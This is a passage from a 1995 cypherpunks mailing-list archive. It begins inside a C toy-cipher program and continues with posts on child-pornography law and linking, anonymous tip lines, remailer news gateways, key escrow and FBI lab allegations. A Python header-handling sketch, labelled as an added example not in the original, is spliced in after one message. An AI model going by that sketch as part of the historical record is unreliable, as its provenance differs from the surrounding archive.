    mat1(a6,a8,&b7,&b8);

    mat1(b1,b3,&a1,&a2);
    mat1(b5,b7,&a3,&a4);
    mat1(b2,b4,&a5,&a6);
    mat1(b6,b8,&a7,&a8);

  /* The round is now completed! */

    printf("after round %d   %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   (int)i,a1,a2,a3,a4,a5,a6,a7,a8);
  }

/* Key 2r+1 is now mixed bit and byte added to produce the final cryptogram */

  a1=a1 ^ k[2*r][0];
  a2=a2 + k[2*r][1];
  a3=a3 + k[2*r][2];
  a4=a4 ^ k[2*r][3];
  a5=a5 ^ k[2*r][4];
  a6=a6 + k[2*r][5];
  a7=a7 + k[2*r][6];
  a8=a8 ^ k[2*r][7];
}

int main(void)
{
  init_tables();
  for(;;)
  {
    set_rounds();
    get_plaintext();
    get_key();

    printf("PLAINTEXT is    %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
    printf("KEY Ka IS       %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   ka[0],ka[1],ka[2],ka[3],ka[4],ka[5],ka[6],ka[7]);
    printf("KEY Kb IS       %3d %3d %3d %3d %3d %3d %3d %3d\n",
	   kb[0],kb[1],kb[2],kb[3],kb[4],kb[5],kb[6],kb[7]);

    key_schedule();
    encrypt();

    printf("CRYPTOGRAM IS   %3d %3d %3d %3d %3d %3d %3d %3d\n\n",
	   a1,a2,a3,a4,a5,a6,a7,a8);
  }
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Sep 95 10:17:47 PDT
To: <cypherpunks@toad.com>
Subject: Child Porn, Morphing, and Pointers
Message-ID: <ac7db05202021004bc61@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:40 PM 9/14/95, Rev. Ben wrote:

>> The bill would expand the definition of child pornography
>> to include any photograph, film, videotape or computer
>> image produced by any means, including electronically by
>> computer, if it depicts or appears to depict a minor
>> engaging in sexually explicit conduct.
>
>If I'm reading this correctly, if I Photoshop a kid's face onto the body
>of the latest Playboy centerfold, I'm in violation of this proposed law?

I believe there have already been prosecutions along these lines. For
example, do you think a _comic book_ with child porn themes ("explicit"
art, situations) would not be prosecuted as child porn?

I strongly suspect that a _painting_ of a 7-year-old girl engaged in a sex
act would result in a prosecution.

Keith Henson, amongst others, has long suggested that a good test case will
be the _morphing_ of legal images to make them look like child porn.

This is not a legal list--for that there are several other fora/forums--but
it is clear that the child porn laws are not necessarily aimed at the
protection of specific minor children from "exploitation," as the laws
apply to porn imported from countries where the age of consent is lower,
apply to images of dead children (who can no longer be exploited by the
images), and to "created" images of children (morphing, cut-and-paste,
paintings, etc.)

The laws are clearly aimed at both extinguishing the _market_ for child
pornography and the _thoughts_ themselves, not at the protection of
specific children. (Advocates will argue that by suppressing the production
of child porn markets, future children may be protected....)

The main Cypherpunks theme I can find here is this: anonymous remailers and
Web proxies will be used to access offshore (or indeterminately located)
sites. The Feds will likely come down very hard on any remailers or proxies
found to be "trafficking" in such materials.

I'm going to post to this list a recent post I made to the Cyberia list
about whether pointers are the same as transfers.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 14 Sep 95 10:24:28 PDT
To: cypherpunks@toad.com
Subject: Linking = Showing = Transferring?
Message-ID: <ac7db410030210049d7f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I posted this to the Cyberia mailing list, but think it has some
implications for Cypherpunks as well. And, I'm responding to Duncan
Frissell, one of our own.

(I don't advise subscribing to Cyberia unless legal issues interest you and
you have the time for another high-volume mailing list. Still, some bright
folks there--as well as some dullards. David Friedman just joined the list.
To subscribe, send a message to listserv@listserv.cc.wm.edu with the
message body of subscribe cyberia-l YourNameHere.)

>
>To:cyberia-l@warthog.cc.wm.edu
>From:tcmay@got.net (Timothy C. May)
>Subject:Linking = Showing = Transferring?
>
>
>As good a chance as any to extend my "showing = telling" point...
>
>At 9:32 AM 9/14/95, Duncan Frissell wrote:
>
>>And my favorite: "What if the student merely includes *links* to
>>the above on his web page?"  Of course racist images/messages are
>>always and everywhere as legal as church on a Sunday although they
>>may carry civil liability in limited cases -- not a problem for
>>judgment-proof students.
>...
>>"Is the URL the page itself? --- Unanswered philosophical questions
>>of the wired age."
>
>_Linking_ is effectively _showing_, given the point-and-click mechanics of
>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson),
>but is now coming to the fore.
>
>Granted, providing a link is not the same as actually _including_ the
>material the link points to, but it is very, very close. Arguably, the
>same.
>
>(Example: I create a home page with links to many images that are child
>pornography by U.S. standards. The images themselves may be initially
>stored in URLs that are in countries with different standards for consent,
>e.g., Denmark or Thailand. Have I violated the child porn laws? Arguably,
>I am "making available" these materials, but all I have done is to provide
>the _pointers_. The readers of my home page are the actual downloaders,
>not me.)
>
>I can imagine rebuttals to this position, arguing that an author who
>includes URLs to other places is doing nothing different than an author
>who includes footnoted references to other works (and surely we all agree
>that footnotes are not copyright infringements of any sort).
>
>However, look at how the Web is being used. Home pages that have
>compilations of interesting things are effectively the works! It is as if
>the original materials are being stored on those home pages themselves!
>
>There is a _technological_ and _propertarian_ fix to this: controlled or
>paid access to the URLs under question. The "gatekeeper" function shifts
>to the actual material under question.
>
>But there are many new questions.
>
>And Duncan's specific point remains:
>
>-- is it a violation of pornography laws (perhaps campus rules) to have a
>home page with links to URLs containing pornographic images?
>
>-- is it a violation of _child pornography_ laws to have a home page with
>links to URLs containing child pornography images? (The URLs could be
>offshore, perhaps in jurisdictions where the age of consent is much
>different than in the U.S., e.g., Denmark or Thailand.)
>
>-- is it a violation of national security laws to have a home page with
>links to URLs containing national defense secrets? (The URLs could be
>offshore.)
>
>-- is it a violation of copyright/patent laws to have home pages with
>pointers to protected material? (Songs, written works, images, inventions,
>etc.)
>
>And so on....
>
>--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David C. Lambert" <dcl@panix.com>
Date: Thu, 14 Sep 95 07:28:31 PDT
To: cypherpunks@toad.com
Subject: Crimestoppers anon tip mailbox
Message-ID: <199509141428.KAA10931@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Frank Stuart <fstuart@vetmed.auburn.edu> writes:

> Now that you mention it, it seems to me that completely anonymous tipsters
> with the ability to receive ecash rewards would likely be a bigger boon to
> law enforcement types than would easily tappable communications lines.  
> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
> use through the remailers)?

I might be.

>  You could set up a web-page with instructions
>  and a list of crimes for which there are rewards.  Perhaps some civic
>  organizations would be willing to donate money for tips leading to arrests
>  and convictions of any crimes.

Excellent idea.  Then it could be brought to the attention of a candidate
or two that have net.crime on their agendas.

>  Even if it doesn't catch any bad guys, it'd be
>  great PR for strong crypto, anonymity, ecash and whoever runs it.
                                                    ^^^^^^^^^^^^^^^

Well, I don't know about the last part - it seems to me that opinions
would be mixed.

The only thing that I'm not sure of is the use of ecash - mostly
because I haven't really been keeping track of the state of the
art.  Could some people who are better informed on the subject
discuss whether this is a feasible way to use it?

I wasn't actually thinking of rewards, mostly because you'd have to
arrange some sort of reply block from the anonymous tip mailbox.
Most people (even remailer users) don't know how or don't wish to
use these, so I don't know if that part would really fly.


David C. Lambert
dcl@panix.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMFg8D6pplsfgM88VAQG6lQP+OpKrDF73T8zupGfco0VREUa98wLYR7VX
Jw2OyUHYML28VQNxwikZNTwBObotEihVo6uH9xRKzhBnpzqol1D/ZAj+1z24x2EK
byqhSp4PJEiKmzqW0chWCeIhX6ND45E2vSweBB6/OPotlZw9C7ZfnM+i0cfII3gb
Np+Dec/mLHU=
=M+KT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@nntp.com>
Date: Thu, 14 Sep 95 07:31:06 PDT
To: Remailer-Operators@c2.org
Subject: Re: Mixmaster posting poll
Message-ID: <199509141429.KAA23068@nntp.com>
MIME-Version: 1.0
Content-Type: text/plain


> I think that I am not being clear enough about what I want to do.

Ah, now I understand -- thanks for the clarification.

Let me waste a bit of time on some general news/mail issues.  The two
formats are very similar, but not identical.  This is generally a good
thing.  For example, it's easy to write a single user interface that handles
both.  (Many people like having killfiles on their email, for example.)

However, when you start to gateway between the two, the differences become
more important.  For example, suppose an article has To, Newsgroups, and Cc
headers.  What should happen?  Some news user-agents (used to?) email as
well as post when given a news article with those headers.  And what happens
when an article is then gatewayed back out to email, and care isn't taken to
strip those headers off?  (Rhetorical question; I don't know.)  I think
this is of particular concern to this community.  Imagine a mail->news remailer
that gatewayed messages by connection to UUNET's accept-from-anyone server
and posted them to alt.blacknet.  Interested parties might then get a full
feed and locally gateway alt.blacknet into a mailing list.  So this kind of
multi-time gatewaying, if not common now, could (and should?) be soon.

I guess that's a long way of saying "be careful." :)

The advantage of using "news.group@gateway.host" is that it might
avoid these confusions since the Newsgroup header appears out-of-band.
However setting up gateways like this is often harder, requiring
special prefixes (viz., usenet.news.group@gate.host is/was common),
hundreds (thousands) of aliases, or the ability to set up special
mailer config (typically sendmail.cf on the internet these days)
that recognize only the top-level hierarchies (of which there are
hundreds, changing weekly).  There is also the problem of making sure
that the mail newsgroup list is kept in sync with the local host's
newsgroup list.  An even bigger problem is that cross-postings are
essentially impossible (you get multiple copies); this can be annoying
if you want to cross-post to a group that the gateway host doesn't receive.
A workable trick is to post to control,alt.blacknet -- everyone "gets"
control but only those that care will see the article where it should
really go.

If you use something like mail2news@gate.host, then the newsgroups are
in the Newsgroups header.  You have to be careful about To and Cc but
you don't have the problems mentioned above.

I think the header problem is more likely fixed/fixable, and therefore suggest
the second syntax.

If you do local gatewaying, you should really send your article into rnews
and not inews.  Inews will mess with headers, which is okay for users or
scripts that know they can be sloppy.  But not okay for gateways which
don't want .signature files appended, too-much-quoted-text counted, etc.
Feeding into rnews is not difficult -- you need merely ensure that your
message has these six headers:  Message-ID Newsgroups From Date Subject Path.
The other advantage of feeding into rnews is that rnews always spools if
the news processor is unavailable, while inews doesn't.

Another option is to provide a program that can connect to a specified
host and inject the gatewayed article directly using the NNTP protocol.
This is not hard; INN includes a program (feedone.c) that does it in
about 200 commented source lines.

INN is available from many places, including
	ftp://ftp.uu.net/networking/news/nntp/inn/inn1.4sec2.tar.Z
and my news/mail gateway software (newsgate) is available by sending
me email.

Hope this helps.
	/r$
>
> At 8:35 AM 9/13/95, Rich Salz wrote:
> >>       If the form alt.usenet.group@remailer.com was used, wouldn't the
> >> system running the remailer have to have an alias defined for each and
> >> every newsgroup that it plans on handling?
> >
> >No.  Sites running sendmail, for example, could set up rules that
> >just knew the top-level hierarchies and fed those into a special
> >"mailer" that gatewayed them.
> >
> >My opinion is that making any names well-known is a bad idea, and
> >that attaching special semantics to "mail2news@xxx" is a real bad
> >idea.  Instead, just send the message to the specified recipient
> >and let it do whatever magic needs to be done.
> >
> >If mixmaster wants to function as a mail/news gateway, it should
> >do something special when it sees the Newsgroups header -- process
> >the message and feed it into rnews, presumably.
> >
> >I guess, but not yet having read the code do not know, that this is
> >cleaner and more easily extensible (or removable).
> >        /r$
>
> ----------------------------------------------------------
> Lance Cottrell   loki@obscura.com
> PGP 2.6 key available by finger or server.
> Mixmaster, the next generation remailer, is now available!
> http://obscura.com/~loki/Welcome.html or FTP to obscura.com
>
> "Love is a snowmobile racing across the tundra.  Suddenly
> it flips over, pinning you underneath.  At night the ice
> weasels come."
>                         --Nietzsche
> ----------------------------------------------------------
>
>
>
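
The header handling Rich Salz describes above, as an added example that is not part of the original message and is not code from INN or newsgate: a Python sketch that prepares a mail message for rnews by dropping To and Cc (so a later news-to-mail gateway cannot re-mail it) and ensuring the six headers he lists are present. The host name, function names, newsgroup-name syntax and sample message are assumptions constructed for illustration.

```python
import email
import hashlib
import re
from email.utils import formatdate

# The six headers the message above lists as required by rnews.
REQUIRED = ("Message-ID", "Newsgroups", "From", "Date", "Subject", "Path")
# Mail routing headers; left in place, a later news->mail gateway could
# act on them and re-mail the article to the original recipients.
MAIL_ONLY = ("To", "Cc", "Bcc")
# Conservative newsgroup-name syntax (assumption for this example).
GROUP_RE = re.compile(r"[a-z0-9+_-]+(\.[a-z0-9+_-]+)*")
GATEWAY_HOST = "gateway.example"  # hypothetical host name

# Constructed sample input, not a real message.
SAMPLE_MAIL = """\
From: Nobody <nobody@remailer.example>
To: mail2news@gateway.example
Cc: someone@elsewhere.example
Newsgroups: alt.test, misc.test,alt.test
Subject: gateway test

Body line.
"""


def clean_newsgroups(value):
    """Return a de-duplicated, comma-joined group list or raise ValueError."""
    groups = []
    for name in (value or "").split(","):
        name = name.strip()
        if not name:
            continue
        # Rejects embedded whitespace or newlines from a folded header.
        if not GROUP_RE.fullmatch(name):
            raise ValueError("bad newsgroup name: %r" % name)
        if name not in groups:
            groups.append(name)
    if not groups:
        raise ValueError("no Newsgroups header; nothing to gateway")
    return ",".join(groups)


def set_header(msg, name, value):
    """Replace every occurrence of a header with a single value."""
    del msg[name]
    msg[name] = value


def mail_to_news(raw, host=GATEWAY_HOST):
    """Turn raw mail text into a Message carrying the six rnews headers."""
    msg = email.message_from_string(raw)
    groups = clean_newsgroups(msg.get("Newsgroups"))
    if not msg.get("From"):
        raise ValueError("From header is required")
    for name in MAIL_ONLY:
        del msg[name]  # no error if the header is absent
    set_header(msg, "Newsgroups", groups)
    if not msg.get("Subject"):
        set_header(msg, "Subject", "(no subject)")
    if not msg.get("Date"):
        set_header(msg, "Date", formatdate())
    if not msg.get("Message-ID"):
        # Derived from the content, so gatewaying the same mail twice gives
        # the same ID and the news system can drop the duplicate.
        digest = hashlib.sha256(raw.encode("utf-8")).hexdigest()[:24]
        set_header(msg, "Message-ID", "<%s@%s>" % (digest, host))
    # An existing Message-ID is kept for the same reason.
    old_path = msg.get("Path")
    tail = old_path.strip() if old_path else "not-for-mail"
    set_header(msg, "Path", host + "!" + tail)
    return msg


def missing_headers(msg):
    """List which of the six required headers are absent or empty."""
    return [name for name in REQUIRED if not msg.get(name)]


if __name__ == "__main__":
    print(mail_to_news(SAMPLE_MAIL).as_string())
```

The text returned by `as_string()` is what a local gateway would hand to rnews.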




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Thu, 14 Sep 95 08:35:41 PDT
To: mark@unicorn.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509141535.KAA05557@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>> Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
>> use through the remailers)?  You could set up a web-page with instructions
>> and a list of crimes for which there are rewards.
>
>Someone already tried that. The cops got a copy of the WWW logs and 
>started investigating everyone who'd looked at the WWW page... So at the 
>least you'd need a bunch of anonymous WWW proxies as well.

Yuck.  Well, if this is going to be a problem, you could distribute a
periodic FAQ via Usenet instead.

>There's also the problem that the current ecash systems do not provide 
>payee anonymity, so if you pay informers with ecash they can be traced if 
>the bank and payer collude.

That's a real problem and underscores the need for better ecash.  :)


Frank Stuart              | (Admiral Grace) Hopper's Law:
fstuart@vetmed.auburn.edu | It's easier to get forgiveness than permission. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Thu, 14 Sep 95 07:41:14 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: WAS_tem
In-Reply-To: <199509141313.JAA12828@pipe4.nyc.pipeline.com>
Message-ID: <Pine.A32.3.91.950914103818.18450A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>    The New York Times, September 14, 1995, pp. A1, B14.
> 
>    Use of Computer Network For Child Sex Sets Off Raids

[snip]

>    Lawmakers have debated whether to restrict the use of 
> computer networks. Today, a bill making it illegal to use 
> computers to produce child pornography was introduced by 
> Senator Orrin G. Hatch, the Utah Republican who heads the 
> Judiciary Committee. 
> 
> The bill would expand the definition of child pornography 
> to include any photograph, film, videotape or computer 
> image produced by any means, including electronically by 
> computer, if it depicts or appears to depict a minor 
> engaging in sexually explicit conduct. 

If I'm reading this correctly, if I Photoshop a kid's face onto the body 
of the latest Playboy centerfold, I'm in violation of this proposed law?

Ben
____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  
PGP encrypted mail welcomed--finger samman@cs.yale.edu for public key


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQB1AwUBMFg+8L5ALmeTVXAJAQEJswL+KijGeD+NIxOEdGkusWl/l8kLpigd73r1
JxoOeo1Sv9jc8JEv89SQDt2xY5i9WhquARph/+N2d7m2FR1DvRnLlHtuvjsV7hjS
mOwurpzx6wHfmJnivojJUqwfTrqxT5gG
=bUJU
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Wed, 13 Sep 95 17:46:21 PDT
To: cypherpunks@toad.com
Subject: re: CYPHERPUNK considered harmful.
Message-ID: <9509140046.AA07859@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


P. Trei writes
>                  "CYPHERPUNK" considered harmful

>     I would like to propose that we, the 'cypherpunks', are making a
> strategic error, which will make it far more difficult to achieve the
> goal we share.
>      Our error lies in our approach to encouraging the widespread use of
> crypto. It is an error of hubris - overweening pride.

>      We too often think of ourselves as an elite - smarter and better in
> various ways to our non-cpunk neighbours. We refer to these others as
> 'Joe Sixpack' and other such derogatory terms. 

I think this is confusing two separate things. The need to publicise 
and encourage the use of crypto is important to many of us and lots of us
do this in various ways (web pages, magazine articles etc). The other aspect
of the cypherpunks is writing code, discussing protocols etc, some of which
is fairly arcane stuff and is by necessity the interest of an "elite" (as you
put it). I think the success of this list lies in the mixture.

>      I suggest that we drop the term 'cypherpunk' - it has the wrong
> connotations to get our ideas into the mainstream. I don't have a 
> perfect replacement yet:

I'll come clean and say that
initially the term "cypherpunks" made me cringe (and still does, maybe 'cos
I'm a brit ;-) ;-) but I certainly remembered it and it stuck in my mind enough
to get me interested in this stuff in the first place. In short, don't ditch
the name because if nothing else it *is* memorable, much more so than some more
conventional tag.

However, you do make some bloody good points about not alienating more
conservative people by coming over all crypto-anarchist (or whatever your 
particular bent is) when encouraging/publicising the use of crypto. 
The "why use crypto" questions and answers was a good example of how to
appeal to a more conservative viewpoint. When trying to find out about
crypto initially on the WWW I was rather overwhelmed by the number of political 
rants and a bit underwhelmed by the lack of solid info. This situation has 
improved a lot in the last 2 years but still needs work IMHO. 

[An aside to Web page maintainers...
<whinge>
Another thing to consider (for Web sites in particular) is that people 
from _all over the world_ will be reading it. If your site is a fairly 
central one, bear in mind that a lot of rants about congress trampling all over
the Nth amendment mean bugger all to a lot of us furriners, and come over
as a bit parochial. I'm not saying a local perspective is a bad thing, just
that it shouldn't be the only thing.
</whinge> ]

my 2c worth

Sherry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: trollins@hns.com (Tom Rollins)
Date: Thu, 14 Sep 95 07:48:21 PDT
Subject: Re: Scientology tries to break PGP - and
Message-ID: <9509141448.AA18318@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text/plain


This area of court ordered key disclosure is troubling.

I assume that failure to do so would be punished by
"contempt of court" much like a reporter that refuses
to reveal his information sources. (Jail or Fine until
the person complies with the order).

If you have PGP encrypted messages on your disk which
are encrypted to other people.  Is this a liability?

Normally, you have no way to decrypt this data.

After looking at a PGP 'Hack' which allows the message
to be encrypted with a session key different from the
session key encrypted in the RSA header using someone's
public key.  Your data could thus be encrypted in a PGP
message to someone without using the session key specified
in that RSA header.

This someone else may or may not exist.  You may have
created a key pair and discarded the secret key.
It would then seem that you could be found in "Contempt of
Court" because you could not come forward with a private
key belonging to someone other than yourself.

-tom








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Thu, 14 Sep 95 08:29:58 PDT
To: trei@process.com
Subject: Re: CYPHERPUNK considered harmful.
In-Reply-To: <199509132016.NAA02103@comsec.com>
Message-ID: <9509141511.AA05860@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "Peter Trei" <trei@process.com>
>Date:          Wed, 13 Sep 1995 10:37:46 -6

>--------------------------------------------------------------
>
>	Towards this goal, I have written a short Q&A that could be
>used as a model when discussing cryptography with non-cypherpunks.


>Q: Aren't LEAs worried that strong encryption will make it more
>difficult for them to catch crooks?

Yes, some are -- especially at higher levels.  LEAs in the field (by my
informal survey) are not.  They're worried instead about manpower and normal
tools (e.g., computers back at the station, radios, ...).

Meanwhile, there is an advantage for LEAs when criminals have, for example,
encrypting phones.  A phone itself gives the person using it a sense of
privacy.  [This is probably a side effect of the psychological cues which
result from using a handset.  If you pull a handset away from your ear or
mouth very far, you can't converse.  Someone standing in the same room as
you probably can not hear the words you hear in your ear.  If the handset
were another person, this behavior would be called "whispering" --
something done to achieve privacy.]

An encrypting phone (or e-mail for that matter) gives the impression (and,
to some extent, reality) of extra privacy.

When there is a perception of privacy, the people conversing are more
likely to reveal things which they don't want overheard.  If these people
are criminals, those things might be used as evidence against them.

The advantage for LEAs comes from the fact that the person at the other end
of the line might well be an LEA in disguise.  This is especially true on
the Internet (or on AOL, to cite a recent case), where the other person may
well be someone you have never met and therefore haven't checked out to
verify level of criminality.

>Q: What's this 'key escrow' thing? 
>
>A: Some government agencies have been trying to figure out methods which
>simultaneously permit US citizens to use strong cryptography against
>criminal eavesdroppers, while retaining the ease with which LEAs can
>currently tap your calls. The schemes generally involve something
>mistitled 'key escrow', in which copies of cryptographic keys would be
>stored at sites accessible by LEAs.

'key escrow' is a code word for government access to the unencrypted
message.  It is a persistent theme, dating back to the NSA's CCEP in about
1987.  'key escrow' is also the name of a technique by which the most
recent example of this access, Clipper/Capstone, achieved that government
access.

	( see http://www.clark.net/pub/cme/html/no-ke.html#etymology )

>Q: Why do you object to it?
>
>A: This is a bit as if your local police department ordered you to send
>them copies of all of your house, car, and office keys, so that they
>could enter whenever they felt it warranted, without your knowledge.
>
>Even assuming no keys will be leaked to criminals from such a valuable
>archive, it's an incredible boondoggle. The initial cost is tens of
>millions of dollars per year, by the most conservative government
>estimates. In reality, it's likely to be hundreds of millions a year,
>all to enable LEAs to investigate a type of crime which does not yet
>occur, and may never occur.

My preferred analogy so far (from http://www.clark.net/pub/cme/html/avss.html)
is:

	It is one thing to permit a police officer to look in an open
	window, see a criminal act in progress, start an investigation or
	make an arrest and use what he or she saw as evidence in an
	eventual trial of the perpetrators.  It is something entirely
	different to prohibit people from using curtains on the grounds
	that curtains might prevent a police officer from seeing a criminal
	act in progress.


>- ------------------------------------------------------
>Cute signature quotes are needed.

There was a great one last week at NIST:

	"Daddy ... if your data is your own property, does it become less
	your property after you encrypt it?"  [Speaker at the NIST
	workshop, September 6-7, 1995]

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Erik E. Fair"  (Time Keeper) <fair@clock.org>
Date: Thu, 14 Sep 95 11:18:54 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster posting poll
Message-ID: <v0211010fac7e1ef7bc57@[198.68.110.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 9/13/95, Lance Cottrell wrote:
>
>I seem to recall that someone on this list wrote some mail2news software,
>Who was it and which standard did it follow (if either). Has anyone installed
>it? Is anyone else planning to install it. I will install a gateway when I
>get my T1 (in a couple of months).


Rich Salz wrote mail2news, based on some ugly stuff I wrote, ages ago.

Erik Fair






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Thu, 14 Sep 95 08:19:50 PDT
To: cypherpunks@toad.com
Subject: Feeb Slants Feeb Slur
Message-ID: <199509141519.LAA11102@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


FBI Probes Slant Allegations


Washington, September 14, 1995 (AP) -- The FBI says it
has reviewed more than 250 cases involving work done by
its crime lab after one of its agents alleged that his
colleagues slanted their testimony and fabricated
evidence to help prosecutors in high-profile cases.

"To date, no evidence tampering, evidence fabrication or
failure to report exculpatory evidence have been found,"
the FBI said in a statement Wednesday. "Any findings of
such misconduct will result in tough and swift action by
the FBI."

Special Agent Frederic Whitehurst, who made the
allegations and was interviewed Wednesday night on
ABC-TV's "Primetime Live" program, labeled the FBI
statement "garbage."

"I am obviously disagreeing with my superiors in this
matter. This report is garbage. ... It's garbage. I
personally know about the review of those 250 cases,"
Whitehurst said.

Whitehurst said he was under orders not to discuss
specific cases.

Defense lawyers want to call Whitehurst as a witness at
the O.J. Simpson murder trial in Los Angeles because he
has claimed that FBI agent Roger Martz, who gave
testimony damaging to Simpson, has slanted evidence in
testimony in other cases.

Asked if there had been evidence tampering at the FBI
lab, Whitehurst told ABC, "Yes, I believe there has been
evidence tampering."

He said he would testify at the Simpson trial "if the FBI
orders me to go."

Martz could not be reached for comment. There was no
answer at the office phones of either Martz or Whitehurst
late Wednesday. Their home phone numbers could not be
found.

The FBI said Whitehurst had, over the past several years,
raised "a variety of concerns about forensic protocols
and procedures employed in the FBI Laboratory," and that
the bureau or the inspector general's office of the
Justice Department, or both, had "vigorously
investigated" his concerns in all instances and were
continuing to do so.

The FBI said its laboratory examinations at trials are
"constantly subject to extraordinarily vigorous challenge
through cross-examination and the presentation of expert
testimony by defense witnesses."

Whitehurst told ABC he was speaking out because it was
his duty as an FBI agent.

"I swore to uphold the constitution of the United States,
and I swore to enforce the law. There was no caveat in
that swearing -- if I caught persons with badges I would
turn my back. I am an FBI agent. It's my duty," he said.

Whitehurst testified last month at the terrorism trial of
Sheik Omar Abdel-Rahman and nine other Muslims accused of
plotting to bomb the United Nations building and other
New York City landmarks that he was pressured to distort
findings about the 1993 World Trade Center bombing to
favor prosecutors.

Citing a series of internal memos sent by Whitehurst to
his FBI supervisors, ABC said the agent listed "one
example after another of what he calls perjury, fraud,
even the fabrication of evidence" in cases at the crime
lab going back at least five years.

One of the cases, ABC said, involved a 1991 Georgia
mail-bombing that killed a federal judge and a civil
rights lawyer. It was investigated by Louis Freeh, now
the FBI director. Walter LeRoy Moody Jr. was convicted in
the deaths.

ABC said Whitehurst alleges that two agents in that case,
one of whom was Martz, slanted evidence by testifying
about tests that weren't done and scientific conclusions
they couldn't support.

The FBI lab was used to analyze blood evidence involving
Simpson. Martz, a toxicologist, was called by the
defense, but was declared a hostile witness. He testified
that blood on a sock from Simpson's bedroom and from the
crime scene showed only vague signs of a preservative.
Simpson's lawyers say the blood was planted and the
presence of the preservative proved it.

While testifying in New York Aug. 14, Whitehurst said
Martz was among several FBI investigators who concluded
the World Trade Center bomb was urea-nitrate-based even
though it was impossible to prove that scientifically
because the substance is so common.

After Whitehurst complained to his superiors, he said,
reports about the bomb were corrected. He said they were
accurate when they were introduced at last year's World
Trade Center trial, which resulted in convictions for
followers of Abdel-Rahman.

At the terror conspiracy trial, Whitehurst said when he
first told his supervisor about the errors, the
supervisor "advised us that he would now have to
embarrass his chemistry toxicology unit chief and that we
were never, ever again to do something like that to him."

Later, Whitehurst said, the supervisor told him he had
been instructed by his bosses to have Whitehurst change
his reports, and debates within the FBI about the
evidence continued throughout the year.

Whitehurst, the FBI's main explosives-residue analyst at
the time of the bombing, said he has since been demoted
and assigned to analyze paint for forensic evidence.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Thu, 14 Sep 95 08:28:24 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: WAS_tem
Message-ID: <Pine.A32.3.91.950914112732.17274B-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Thu, 14 Sep 1995, James A. Donald wrote:


> If you draw a picture using paintbrush of an underage person engaging
> in sexual conduct, you are in violation of this proposed legislation.

Doesn't that directly contradict the stated purpose of existing child 
porn regulation?  That is, doesn't current statute exist in order to 
prevent the exploitation of children, not to mandate morality?

Do the lawyers on the list want to pipe up?

Ben.

-----BEGIN PGP SIGNATURE-----
